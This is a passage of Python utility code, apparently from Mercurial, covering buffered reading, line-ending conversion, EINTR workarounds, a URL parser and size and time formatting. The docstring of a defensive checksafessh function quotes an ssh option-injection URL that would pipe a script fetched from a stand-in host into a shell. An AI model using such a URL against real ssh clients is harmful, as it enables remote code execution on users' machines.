2194 2199 If size parameter is omitted, read everything"""
2195 2200 if l is None:
2196 2201 return ''.join(self.iter)
2197 2202
2198 2203 left = l
2199 2204 buf = []
2200 2205 queue = self._queue
2201 2206 while left > 0:
2202 2207 # refill the queue
2203 2208 if not queue:
2204 2209 target = 2**18
2205 2210 for chunk in self.iter:
2206 2211 queue.append(chunk)
2207 2212 target -= len(chunk)
2208 2213 if target <= 0:
2209 2214 break
2210 2215 if not queue:
2211 2216 break
2212 2217
2213 2218 # The easy way to do this would be to queue.popleft(), modify the
2214 2219 # chunk (if necessary), then queue.appendleft(). However, for cases
2215 2220 # where we read partial chunk content, this incurs 2 dequeue
2216 2221 # mutations and creates a new str for the remaining chunk in the
2217 2222 # queue. Our code below avoids this overhead.
2218 2223
2219 2224 chunk = queue[0]
2220 2225 chunkl = len(chunk)
2221 2226 offset = self._chunkoffset
2222 2227
2223 2228 # Use full chunk.
2224 2229 if offset == 0 and left >= chunkl:
2225 2230 left -= chunkl
2226 2231 queue.popleft()
2227 2232 buf.append(chunk)
2228 2233 # self._chunkoffset remains at 0.
2229 2234 continue
2230 2235
2231 2236 chunkremaining = chunkl - offset
2232 2237
2233 2238 # Use all of unconsumed part of chunk.
2234 2239 if left >= chunkremaining:
2235 2240 left -= chunkremaining
2236 2241 queue.popleft()
2237 2242 # offset == 0 is enabled by block above, so this won't merely
2238 2243 # copy via ``chunk[0:]``.
2239 2244 buf.append(chunk[offset:])
2240 2245 self._chunkoffset = 0
2241 2246
2242 2247 # Partial chunk needed.
2243 2248 else:
2244 2249 buf.append(chunk[offset:offset + left])
2245 2250 self._chunkoffset += left
2246 2251 left -= chunkremaining
2247 2252
2248 2253 return ''.join(buf)
2249 2254
2250 2255 def filechunkiter(f, size=131072, limit=None):
2251 2256 """Create a generator that produces the data in the file size
2252 2257 (default 131072) bytes at a time, up to optional limit (default is
2253 2258 to read all data). Chunks may be less than size bytes if the
2254 2259 chunk is the last chunk in the file, or the file is a socket or
2255 2260 some other type of file that sometimes reads less data than is
2256 2261 requested."""
2257 2262 assert size >= 0
2258 2263 assert limit is None or limit >= 0
2259 2264 while True:
2260 2265 if limit is None:
2261 2266 nbytes = size
2262 2267 else:
2263 2268 nbytes = min(limit, size)
2264 2269 s = nbytes and f.read(nbytes)
2265 2270 if not s:
2266 2271 break
2267 2272 if limit:
2268 2273 limit -= len(s)
2269 2274 yield s
2270 2275
2271 2276 class cappedreader(object):
2272 2277 """A file object proxy that allows reading up to N bytes.
2273 2278
2274 2279 Given a source file object, instances of this type allow reading up to
2275 2280 N bytes from that source file object. Attempts to read past the allowed
2276 2281 limit are treated as EOF.
2277 2282
2278 2283 It is assumed that I/O is not performed on the original file object
2279 2284 in addition to I/O that is performed by this instance. If there is,
2280 2285 state tracking will get out of sync and unexpected results will ensue.
2281 2286 """
2282 2287 def __init__(self, fh, limit):
2283 2288 """Allow reading up to <limit> bytes from <fh>."""
2284 2289 self._fh = fh
2285 2290 self._left = limit
2286 2291
2287 2292 def read(self, n=-1):
2288 2293 if not self._left:
2289 2294 return b''
2290 2295
2291 2296 if n < 0:
2292 2297 n = self._left
2293 2298
2294 2299 data = self._fh.read(min(n, self._left))
2295 2300 self._left -= len(data)
2296 2301 assert self._left >= 0
2297 2302
2298 2303 return data
2299 2304
2300 2305 def readinto(self, b):
2301 2306 res = self.read(len(b))
2302 2307 if res is None:
2303 2308 return None
2304 2309
2305 2310 b[0:len(res)] = res
2306 2311 return len(res)
2307 2312
2308 2313 def unitcountfn(*unittable):
2309 2314 '''return a function that renders a readable count of some quantity'''
2310 2315
2311 2316 def go(count):
2312 2317 for multiplier, divisor, format in unittable:
2313 2318 if abs(count) >= divisor * multiplier:
2314 2319 return format % (count / float(divisor))
2315 2320 return unittable[-1][2] % count
2316 2321
2317 2322 return go
2318 2323
2319 2324 def processlinerange(fromline, toline):
2320 2325 """Check that linerange <fromline>:<toline> makes sense and return a
2321 2326 0-based range.
2322 2327
2323 2328 >>> processlinerange(10, 20)
2324 2329 (9, 20)
2325 2330 >>> processlinerange(2, 1)
2326 2331 Traceback (most recent call last):
2327 2332 ...
2328 2333 ParseError: line range must be positive
2329 2334 >>> processlinerange(0, 5)
2330 2335 Traceback (most recent call last):
2331 2336 ...
2332 2337 ParseError: fromline must be strictly positive
2333 2338 """
2334 2339 if toline - fromline < 0:
2335 2340 raise error.ParseError(_("line range must be positive"))
2336 2341 if fromline < 1:
2337 2342 raise error.ParseError(_("fromline must be strictly positive"))
2338 2343 return fromline - 1, toline
2339 2344
2340 2345 bytecount = unitcountfn(
2341 2346 (100, 1 << 30, _('%.0f GB')),
2342 2347 (10, 1 << 30, _('%.1f GB')),
2343 2348 (1, 1 << 30, _('%.2f GB')),
2344 2349 (100, 1 << 20, _('%.0f MB')),
2345 2350 (10, 1 << 20, _('%.1f MB')),
2346 2351 (1, 1 << 20, _('%.2f MB')),
2347 2352 (100, 1 << 10, _('%.0f KB')),
2348 2353 (10, 1 << 10, _('%.1f KB')),
2349 2354 (1, 1 << 10, _('%.2f KB')),
2350 2355 (1, 1, _('%.0f bytes')),
2351 2356 )
2352 2357
2353 2358 class transformingwriter(object):
2354 2359 """Writable file wrapper to transform data by function"""
2355 2360
2356 2361 def __init__(self, fp, encode):
2357 2362 self._fp = fp
2358 2363 self._encode = encode
2359 2364
2360 2365 def close(self):
2361 2366 self._fp.close()
2362 2367
2363 2368 def flush(self):
2364 2369 self._fp.flush()
2365 2370
2366 2371 def write(self, data):
2367 2372 return self._fp.write(self._encode(data))
2368 2373
2369 2374 # Matches a single EOL which can either be a CRLF where repeated CR
2370 2375 # are removed or a LF. We do not care about old Macintosh files, so a
2371 2376 # stray CR is an error.
2372 2377 _eolre = remod.compile(br'\r*\n')
2373 2378
2374 2379 def tolf(s):
2375 2380 return _eolre.sub('\n', s)
2376 2381
2377 2382 def tocrlf(s):
2378 2383 return _eolre.sub('\r\n', s)
2379 2384
2380 2385 def _crlfwriter(fp):
2381 2386 return transformingwriter(fp, tocrlf)
2382 2387
2383 2388 if pycompat.oslinesep == '\r\n':
2384 2389 tonativeeol = tocrlf
2385 2390 fromnativeeol = tolf
2386 2391 nativeeolwriter = _crlfwriter
2387 2392 else:
2388 2393 tonativeeol = pycompat.identity
2389 2394 fromnativeeol = pycompat.identity
2390 2395 nativeeolwriter = pycompat.identity
2391 2396
2392 2397 if (pyplatform.python_implementation() == 'CPython' and
2393 2398 sys.version_info < (3, 0)):
2394 2399 # There is an issue in CPython that some IO methods do not handle EINTR
2395 2400 # correctly. The following table shows what CPython version (and functions)
2396 2401 # are affected (buggy: has the EINTR bug, okay: otherwise):
2397 2402 #
2398 2403 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2399 2404 # --------------------------------------------------
2400 2405 # fp.__iter__ | buggy | buggy | okay
2401 2406 # fp.read* | buggy | okay [1] | okay
2402 2407 #
2403 2408 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2404 2409 #
2405 2410 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2406 2411 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2407 2412 #
2408 2413 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2409 2414 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2410 2415 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2411 2416 # fp.__iter__ but not other fp.read* methods.
2412 2417 #
2413 2418 # On modern systems like Linux, the "read" syscall cannot be interrupted
2414 2419 # when reading "fast" files like on-disk files. So the EINTR issue only
2415 2420 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2416 2421 # files approximately as "fast" files and use the fast (unsafe) code path,
2417 2422 # to minimize the performance impact.
2418 2423 if sys.version_info >= (2, 7, 4):
2419 2424 # fp.readline deals with EINTR correctly, use it as a workaround.
2420 2425 def _safeiterfile(fp):
2421 2426 return iter(fp.readline, '')
2422 2427 else:
2423 2428 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2424 2429 # note: this may block longer than necessary because of bufsize.
2425 2430 def _safeiterfile(fp, bufsize=4096):
2426 2431 fd = fp.fileno()
2427 2432 line = ''
2428 2433 while True:
2429 2434 try:
2430 2435 buf = os.read(fd, bufsize)
2431 2436 except OSError as ex:
2432 2437 # os.read only raises EINTR before any data is read
2433 2438 if ex.errno == errno.EINTR:
2434 2439 continue
2435 2440 else:
2436 2441 raise
2437 2442 line += buf
2438 2443 if '\n' in buf:
2439 2444 splitted = line.splitlines(True)
2440 2445 line = ''
2441 2446 for l in splitted:
2442 2447 if l[-1] == '\n':
2443 2448 yield l
2444 2449 else:
2445 2450 line = l
2446 2451 if not buf:
2447 2452 break
2448 2453 if line:
2449 2454 yield line
2450 2455
2451 2456 def iterfile(fp):
2452 2457 fastpath = True
2453 2458 if type(fp) is file:
2454 2459 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2455 2460 if fastpath:
2456 2461 return fp
2457 2462 else:
2458 2463 return _safeiterfile(fp)
2459 2464 else:
2460 2465 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2461 2466 def iterfile(fp):
2462 2467 return fp
2463 2468
2464 2469 def iterlines(iterator):
2465 2470 for chunk in iterator:
2466 2471 for line in chunk.splitlines():
2467 2472 yield line
2468 2473
2469 2474 def expandpath(path):
2470 2475 return os.path.expanduser(os.path.expandvars(path))
2471 2476
2472 2477 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2473 2478 """Return the result of interpolating items in the mapping into string s.
2474 2479
2475 2480 prefix is a single character string, or a two character string with
2476 2481 a backslash as the first character if the prefix needs to be escaped in
2477 2482 a regular expression.
2478 2483
2479 2484 fn is an optional function that will be applied to the replacement text
2480 2485 just before replacement.
2481 2486
2482 2487 escape_prefix is an optional flag that allows using doubled prefix for
2483 2488 its escaping.
2484 2489 """
2485 2490 fn = fn or (lambda s: s)
2486 2491 patterns = '|'.join(mapping.keys())
2487 2492 if escape_prefix:
2488 2493 patterns += '|' + prefix
2489 2494 if len(prefix) > 1:
2490 2495 prefix_char = prefix[1:]
2491 2496 else:
2492 2497 prefix_char = prefix
2493 2498 mapping[prefix_char] = prefix_char
2494 2499 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2495 2500 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2496 2501
2497 2502 def getport(port):
2498 2503 """Return the port for a given network service.
2499 2504
2500 2505 If port is an integer, it's returned as is. If it's a string, it's
2501 2506 looked up using socket.getservbyname(). If there's no matching
2502 2507 service, error.Abort is raised.
2503 2508 """
2504 2509 try:
2505 2510 return int(port)
2506 2511 except ValueError:
2507 2512 pass
2508 2513
2509 2514 try:
2510 2515 return socket.getservbyname(pycompat.sysstr(port))
2511 2516 except socket.error:
2512 2517 raise error.Abort(_("no port number associated with service '%s'")
2513 2518 % port)
2514 2519
2515 2520 class url(object):
2516 2521 r"""Reliable URL parser.
2517 2522
2518 2523 This parses URLs and provides attributes for the following
2519 2524 components:
2520 2525
2521 2526 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2522 2527
2523 2528 Missing components are set to None. The only exception is
2524 2529 fragment, which is set to '' if present but empty.
2525 2530
2526 2531 If parsefragment is False, fragment is included in query. If
2527 2532 parsequery is False, query is included in path. If both are
2528 2533 False, both fragment and query are included in path.
2529 2534
2530 2535 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2531 2536
2532 2537 Note that for backward compatibility reasons, bundle URLs do not
2533 2538 take host names. That means 'bundle://../' has a path of '../'.
2534 2539
2535 2540 Examples:
2536 2541
2537 2542 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2538 2543 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2539 2544 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2540 2545 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2541 2546 >>> url(b'file:///home/joe/repo')
2542 2547 <url scheme: 'file', path: '/home/joe/repo'>
2543 2548 >>> url(b'file:///c:/temp/foo/')
2544 2549 <url scheme: 'file', path: 'c:/temp/foo/'>
2545 2550 >>> url(b'bundle:foo')
2546 2551 <url scheme: 'bundle', path: 'foo'>
2547 2552 >>> url(b'bundle://../foo')
2548 2553 <url scheme: 'bundle', path: '../foo'>
2549 2554 >>> url(br'c:\foo\bar')
2550 2555 <url path: 'c:\\foo\\bar'>
2551 2556 >>> url(br'\\blah\blah\blah')
2552 2557 <url path: '\\\\blah\\blah\\blah'>
2553 2558 >>> url(br'\\blah\blah\blah#baz')
2554 2559 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2555 2560 >>> url(br'file:///C:\users\me')
2556 2561 <url scheme: 'file', path: 'C:\\users\\me'>
2557 2562
2558 2563 Authentication credentials:
2559 2564
2560 2565 >>> url(b'ssh://joe:xyz@x/repo')
2561 2566 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2562 2567 >>> url(b'ssh://joe@x/repo')
2563 2568 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2564 2569
2565 2570 Query strings and fragments:
2566 2571
2567 2572 >>> url(b'http://host/a?b#c')
2568 2573 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2569 2574 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2570 2575 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2571 2576
2572 2577 Empty path:
2573 2578
2574 2579 >>> url(b'')
2575 2580 <url path: ''>
2576 2581 >>> url(b'#a')
2577 2582 <url path: '', fragment: 'a'>
2578 2583 >>> url(b'http://host/')
2579 2584 <url scheme: 'http', host: 'host', path: ''>
2580 2585 >>> url(b'http://host/#a')
2581 2586 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2582 2587
2583 2588 Only scheme:
2584 2589
2585 2590 >>> url(b'http:')
2586 2591 <url scheme: 'http'>
2587 2592 """
2588 2593
2589 2594 _safechars = "!~*'()+"
2590 2595 _safepchars = "/!~*'()+:\\"
2591 2596 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2592 2597
2593 2598 def __init__(self, path, parsequery=True, parsefragment=True):
2594 2599 # We slowly chomp away at path until we have only the path left
2595 2600 self.scheme = self.user = self.passwd = self.host = None
2596 2601 self.port = self.path = self.query = self.fragment = None
2597 2602 self._localpath = True
2598 2603 self._hostport = ''
2599 2604 self._origpath = path
2600 2605
2601 2606 if parsefragment and '#' in path:
2602 2607 path, self.fragment = path.split('#', 1)
2603 2608
2604 2609 # special case for Windows drive letters and UNC paths
2605 2610 if hasdriveletter(path) or path.startswith('\\\\'):
2606 2611 self.path = path
2607 2612 return
2608 2613
2609 2614 # For compatibility reasons, we can't handle bundle paths as
2610 2615 # normal URLS
2611 2616 if path.startswith('bundle:'):
2612 2617 self.scheme = 'bundle'
2613 2618 path = path[7:]
2614 2619 if path.startswith('//'):
2615 2620 path = path[2:]
2616 2621 self.path = path
2617 2622 return
2618 2623
2619 2624 if self._matchscheme(path):
2620 2625 parts = path.split(':', 1)
2621 2626 if parts[0]:
2622 2627 self.scheme, path = parts
2623 2628 self._localpath = False
2624 2629
2625 2630 if not path:
2626 2631 path = None
2627 2632 if self._localpath:
2628 2633 self.path = ''
2629 2634 return
2630 2635 else:
2631 2636 if self._localpath:
2632 2637 self.path = path
2633 2638 return
2634 2639
2635 2640 if parsequery and '?' in path:
2636 2641 path, self.query = path.split('?', 1)
2637 2642 if not path:
2638 2643 path = None
2639 2644 if not self.query:
2640 2645 self.query = None
2641 2646
2642 2647 # // is required to specify a host/authority
2643 2648 if path and path.startswith('//'):
2644 2649 parts = path[2:].split('/', 1)
2645 2650 if len(parts) > 1:
2646 2651 self.host, path = parts
2647 2652 else:
2648 2653 self.host = parts[0]
2649 2654 path = None
2650 2655 if not self.host:
2651 2656 self.host = None
2652 2657 # path of file:///d is /d
2653 2658 # path of file:///d:/ is d:/, not /d:/
2654 2659 if path and not hasdriveletter(path):
2655 2660 path = '/' + path
2656 2661
2657 2662 if self.host and '@' in self.host:
2658 2663 self.user, self.host = self.host.rsplit('@', 1)
2659 2664 if ':' in self.user:
2660 2665 self.user, self.passwd = self.user.split(':', 1)
2661 2666 if not self.host:
2662 2667 self.host = None
2663 2668
2664 2669 # Don't split on colons in IPv6 addresses without ports
2665 2670 if (self.host and ':' in self.host and
2666 2671 not (self.host.startswith('[') and self.host.endswith(']'))):
2667 2672 self._hostport = self.host
2668 2673 self.host, self.port = self.host.rsplit(':', 1)
2669 2674 if not self.host:
2670 2675 self.host = None
2671 2676
2672 2677 if (self.host and self.scheme == 'file' and
2673 2678 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2674 2679 raise error.Abort(_('file:// URLs can only refer to localhost'))
2675 2680
2676 2681 self.path = path
2677 2682
2678 2683 # leave the query string escaped
2679 2684 for a in ('user', 'passwd', 'host', 'port',
2680 2685 'path', 'fragment'):
2681 2686 v = getattr(self, a)
2682 2687 if v is not None:
2683 2688 setattr(self, a, urlreq.unquote(v))
2684 2689
2685 2690 @encoding.strmethod
2686 2691 def __repr__(self):
2687 2692 attrs = []
2688 2693 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2689 2694 'query', 'fragment'):
2690 2695 v = getattr(self, a)
2691 2696 if v is not None:
2692 2697 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2693 2698 return '<url %s>' % ', '.join(attrs)
2694 2699
2695 2700 def __bytes__(self):
2696 2701 r"""Join the URL's components back into a URL string.
2697 2702
2698 2703 Examples:
2699 2704
2700 2705 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2701 2706 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2702 2707 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2703 2708 'http://user:pw@host:80/?foo=bar&baz=42'
2704 2709 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2705 2710 'http://user:pw@host:80/?foo=bar%3dbaz'
2706 2711 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2707 2712 'ssh://user:pw@[::1]:2200//home/joe#'
2708 2713 >>> bytes(url(b'http://localhost:80//'))
2709 2714 'http://localhost:80//'
2710 2715 >>> bytes(url(b'http://localhost:80/'))
2711 2716 'http://localhost:80/'
2712 2717 >>> bytes(url(b'http://localhost:80'))
2713 2718 'http://localhost:80/'
2714 2719 >>> bytes(url(b'bundle:foo'))
2715 2720 'bundle:foo'
2716 2721 >>> bytes(url(b'bundle://../foo'))
2717 2722 'bundle:../foo'
2718 2723 >>> bytes(url(b'path'))
2719 2724 'path'
2720 2725 >>> bytes(url(b'file:///tmp/foo/bar'))
2721 2726 'file:///tmp/foo/bar'
2722 2727 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2723 2728 'file:///c:/tmp/foo/bar'
2724 2729 >>> print(url(br'bundle:foo\bar'))
2725 2730 bundle:foo\bar
2726 2731 >>> print(url(br'file:///D:\data\hg'))
2727 2732 file:///D:\data\hg
2728 2733 """
2729 2734 if self._localpath:
2730 2735 s = self.path
2731 2736 if self.scheme == 'bundle':
2732 2737 s = 'bundle:' + s
2733 2738 if self.fragment:
2734 2739 s += '#' + self.fragment
2735 2740 return s
2736 2741
2737 2742 s = self.scheme + ':'
2738 2743 if self.user or self.passwd or self.host:
2739 2744 s += '//'
2740 2745 elif self.scheme and (not self.path or self.path.startswith('/')
2741 2746 or hasdriveletter(self.path)):
2742 2747 s += '//'
2743 2748 if hasdriveletter(self.path):
2744 2749 s += '/'
2745 2750 if self.user:
2746 2751 s += urlreq.quote(self.user, safe=self._safechars)
2747 2752 if self.passwd:
2748 2753 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2749 2754 if self.user or self.passwd:
2750 2755 s += '@'
2751 2756 if self.host:
2752 2757 if not (self.host.startswith('[') and self.host.endswith(']')):
2753 2758 s += urlreq.quote(self.host)
2754 2759 else:
2755 2760 s += self.host
2756 2761 if self.port:
2757 2762 s += ':' + urlreq.quote(self.port)
2758 2763 if self.host:
2759 2764 s += '/'
2760 2765 if self.path:
2761 2766 # TODO: similar to the query string, we should not unescape the
2762 2767 # path when we store it, the path might contain '%2f' = '/',
2763 2768 # which we should *not* escape.
2764 2769 s += urlreq.quote(self.path, safe=self._safepchars)
2765 2770 if self.query:
2766 2771 # we store the query in escaped form.
2767 2772 s += '?' + self.query
2768 2773 if self.fragment is not None:
2769 2774 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2770 2775 return s
2771 2776
2772 2777 __str__ = encoding.strmethod(__bytes__)
2773 2778
2774 2779 def authinfo(self):
2775 2780 user, passwd = self.user, self.passwd
2776 2781 try:
2777 2782 self.user, self.passwd = None, None
2778 2783 s = bytes(self)
2779 2784 finally:
2780 2785 self.user, self.passwd = user, passwd
2781 2786 if not self.user:
2782 2787 return (s, None)
2783 2788 # authinfo[1] is passed to urllib2 password manager, and its
2784 2789 # URIs must not contain credentials. The host is passed in the
2785 2790 # URIs list because Python < 2.4.3 uses only that to search for
2786 2791 # a password.
2787 2792 return (s, (None, (s, self.host),
2788 2793 self.user, self.passwd or ''))
2789 2794
2790 2795 def isabs(self):
2791 2796 if self.scheme and self.scheme != 'file':
2792 2797 return True # remote URL
2793 2798 if hasdriveletter(self.path):
2794 2799 return True # absolute for our purposes - can't be joined()
2795 2800 if self.path.startswith(br'\\'):
2796 2801 return True # Windows UNC path
2797 2802 if self.path.startswith('/'):
2798 2803 return True # POSIX-style
2799 2804 return False
2800 2805
2801 2806 def localpath(self):
2802 2807 if self.scheme == 'file' or self.scheme == 'bundle':
2803 2808 path = self.path or '/'
2804 2809 # For Windows, we need to promote hosts containing drive
2805 2810 # letters to paths with drive letters.
2806 2811 if hasdriveletter(self._hostport):
2807 2812 path = self._hostport + '/' + self.path
2808 2813 elif (self.host is not None and self.path
2809 2814 and not hasdriveletter(path)):
2810 2815 path = '/' + path
2811 2816 return path
2812 2817 return self._origpath
2813 2818
2814 2819 def islocal(self):
2815 2820 '''whether localpath will return something that posixfile can open'''
2816 2821 return (not self.scheme or self.scheme == 'file'
2817 2822 or self.scheme == 'bundle')
2818 2823
2819 2824 def hasscheme(path):
2820 2825 return bool(url(path).scheme)
2821 2826
2822 2827 def hasdriveletter(path):
2823 2828 return path and path[1:2] == ':' and path[0:1].isalpha()
2824 2829
2825 2830 def urllocalpath(path):
2826 2831 return url(path, parsequery=False, parsefragment=False).localpath()
2827 2832
2828 2833 def checksafessh(path):
2829 2834 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2830 2835
2831 2836 This is a sanity check for ssh urls. ssh will parse the first item as
2832 2837 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2833 2838 Let's prevent these potentially exploited urls entirely and warn the
2834 2839 user.
2835 2840
2836 2841 Raises an error.Abort when the url is unsafe.
2837 2842 """
2838 2843 path = urlreq.unquote(path)
2839 2844 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2840 2845 raise error.Abort(_('potentially unsafe url: %r') %
2841 2846 (pycompat.bytestr(path),))
2842 2847
2843 2848 def hidepassword(u):
2844 2849 '''hide user credential in a url string'''
2845 2850 u = url(u)
2846 2851 if u.passwd:
2847 2852 u.passwd = '***'
2848 2853 return bytes(u)
2849 2854
2850 2855 def removeauth(u):
2851 2856 '''remove all authentication information from a url string'''
2852 2857 u = url(u)
2853 2858 u.user = u.passwd = None
2854 2859 return bytes(u)
2855 2860
2856 2861 timecount = unitcountfn(
2857 2862 (1, 1e3, _('%.0f s')),
2858 2863 (100, 1, _('%.1f s')),
2859 2864 (10, 1, _('%.2f s')),
2860 2865 (1, 1, _('%.3f s')),
2861 2866 (100, 0.001, _('%.1f ms')),
2862 2867 (10, 0.001, _('%.2f ms')),
2863 2868 (1, 0.001, _('%.3f ms')),
2864 2869 (100, 0.000001, _('%.1f us')),
2865 2870 (10, 0.000001, _('%.2f us')),
2866 2871 (1, 0.000001, _('%.3f us')),
2867 2872 (100, 0.000000001, _('%.1f ns')),
2868 2873 (10, 0.000000001, _('%.2f ns')),
2869 2874 (1, 0.000000001, _('%.3f ns')),
2870 2875 )
2871 2876
2872 2877 _timenesting = [0]
2873 2878
2874 2879 def timed(func):
2875 2880 '''Report the execution time of a function call to stderr.
2876 2881
2877 2882 During development, use as a decorator when you need to measure
2878 2883 the cost of a function, e.g. as follows:
2879 2884
2880 2885 @util.timed
2881 2886 def foo(a, b, c):
2882 2887 pass
2883 2888 '''
2884 2889
2885 2890 def wrapper(*args, **kwargs):
2886 2891 start = timer()
2887 2892 indent = 2
2888 2893 _timenesting[0] += indent
2889 2894 try:
2890 2895 return func(*args, **kwargs)
2891 2896 finally:
2892 2897 elapsed = timer() - start
2893 2898 _timenesting[0] -= indent
2894 2899 stderr = procutil.stderr
2895 2900 stderr.write('%s%s: %s\n' %
2896 2901 (' ' * _timenesting[0], func.__name__,
2897 2902 timecount(elapsed)))
2898 2903 return wrapper
2899 2904
2900 2905 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2901 2906 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2902 2907
2903 2908 def sizetoint(s):
2904 2909 '''Convert a space specifier to a byte count.
2905 2910
2906 2911 >>> sizetoint(b'30')
2907 2912 30
2908 2913 >>> sizetoint(b'2.2kb')
2909 2914 2252
2910 2915 >>> sizetoint(b'6M')
2911 2916 6291456
2912 2917 '''
2913 2918 t = s.strip().lower()
2914 2919 try:
2915 2920 for k, u in _sizeunits:
2916 2921 if t.endswith(k):
2917 2922 return int(float(t[:-len(k)]) * u)
2918 2923 return int(t)
2919 2924 except ValueError:
2920 2925 raise error.ParseError(_("couldn't parse size: %s") % s)
2921 2926
2922 2927 class hooks(object):
2923 2928 '''A collection of hook functions that can be used to extend a
2924 2929 function's behavior. Hooks are called in lexicographic order,
2925 2930 based on the names of their sources.'''
2926 2931
2927 2932 def __init__(self):
2928 2933 self._hooks = []
2929 2934
2930 2935 def add(self, source, hook):
2931 2936 self._hooks.append((source, hook))
2932 2937
2933 2938 def __call__(self, *args):
2934 2939 self._hooks.sort(key=lambda x: x[0])
2935 2940 results = []
2936 2941 for source, hook in self._hooks:
2937 2942 results.append(hook(*args))
2938 2943 return results
2939 2944
2940 2945 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2941 2946 '''Yields lines for a nicely formatted stacktrace.
2942 2947 Skips the 'skip' last entries, then return the last 'depth' entries.
2943 2948 Each file+linenumber is formatted according to fileline.
2944 2949 Each line is formatted according to line.
2945 2950 If line is None, it yields:
2946 2951 length of longest filepath+line number,
2947 2952 filepath+linenumber,
2948 2953 function
2949 2954
2950 2955 Not be used in production code but very convenient while developing.
2951 2956 '''
2952 2957 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2953 2958 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2954 2959 ][-depth:]
2955 2960 if entries:
2956 2961 fnmax = max(len(entry[0]) for entry in entries)
2957 2962 for fnln, func in entries:
2958 2963 if line is None:
2959 2964 yield (fnmax, fnln, func)
2960 2965 else:
2961 2966 yield line % (fnmax, fnln, func)
2962 2967
2963 2968 def debugstacktrace(msg='stacktrace', skip=0,
2964 2969 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2965 2970 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2966 2971 Skips the 'skip' entries closest to the call, then show 'depth' entries.
2967 2972 By default it will flush stdout first.
2968 2973 It can be used everywhere and intentionally does not require an ui object.
2969 2974 Not be used in production code but very convenient while developing.
2970 2975 '''
2971 2976 if otherf:
2972 2977 otherf.flush()
2973 2978 f.write('%s at:\n' % msg.rstrip())
2974 2979 for line in getstackframes(skip + 1, depth=depth):
2975 2980 f.write(line)
2976 2981 f.flush()
2977 2982
2978 2983 class dirs(object):
2979 2984 '''a multiset of directory names from a dirstate or manifest'''
2980 2985
2981 2986 def __init__(self, map, skip=None):
2982 2987 self._dirs = {}
2983 2988 addpath = self.addpath
2984 2989 if safehasattr(map, 'iteritems') and skip is not None:
2985 2990 for f, s in map.iteritems():
2986 2991 if s[0] != skip:
2987 2992 addpath(f)
2988 2993 else:
2989 2994 for f in map:
2990 2995 addpath(f)
2991 2996
2992 2997 def addpath(self, path):
2993 2998 dirs = self._dirs
2994 2999 for base in finddirs(path):
2995 3000 if base in dirs:
2996 3001 dirs[base] += 1
2997 3002 return
2998 3003 dirs[base] = 1
2999 3004
3000 3005 def delpath(self, path):
3001 3006 dirs = self._dirs
3002 3007 for base in finddirs(path):
3003 3008 if dirs[base] > 1:
3004 3009 dirs[base] -= 1
3005 3010 return
3006 3011 del dirs[base]
3007 3012
3008 3013 def __iter__(self):
3009 3014 return iter(self._dirs)
3010 3015
3011 3016 def __contains__(self, d):
3012 3017 return d in self._dirs
3013 3018
3014 3019 if safehasattr(parsers, 'dirs'):
3015 3020 dirs = parsers.dirs
3016 3021
3017 3022 def finddirs(path):
3018 3023 pos = path.rfind('/')
3019 3024 while pos != -1:
3020 3025 yield path[:pos]
3021 3026 pos = path.rfind('/', 0, pos)
3022 3027
3023 3028 # compression code
3024 3029
3025 3030 SERVERROLE = 'server'
3026 3031 CLIENTROLE = 'client'
3027 3032
3028 3033 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3029 3034 (u'name', u'serverpriority',
3030 3035 u'clientpriority'))
3031 3036
3032 3037 class compressormanager(object):
3033 3038 """Holds registrations of various compression engines.
3034 3039
3035 3040 This class essentially abstracts the differences between compression
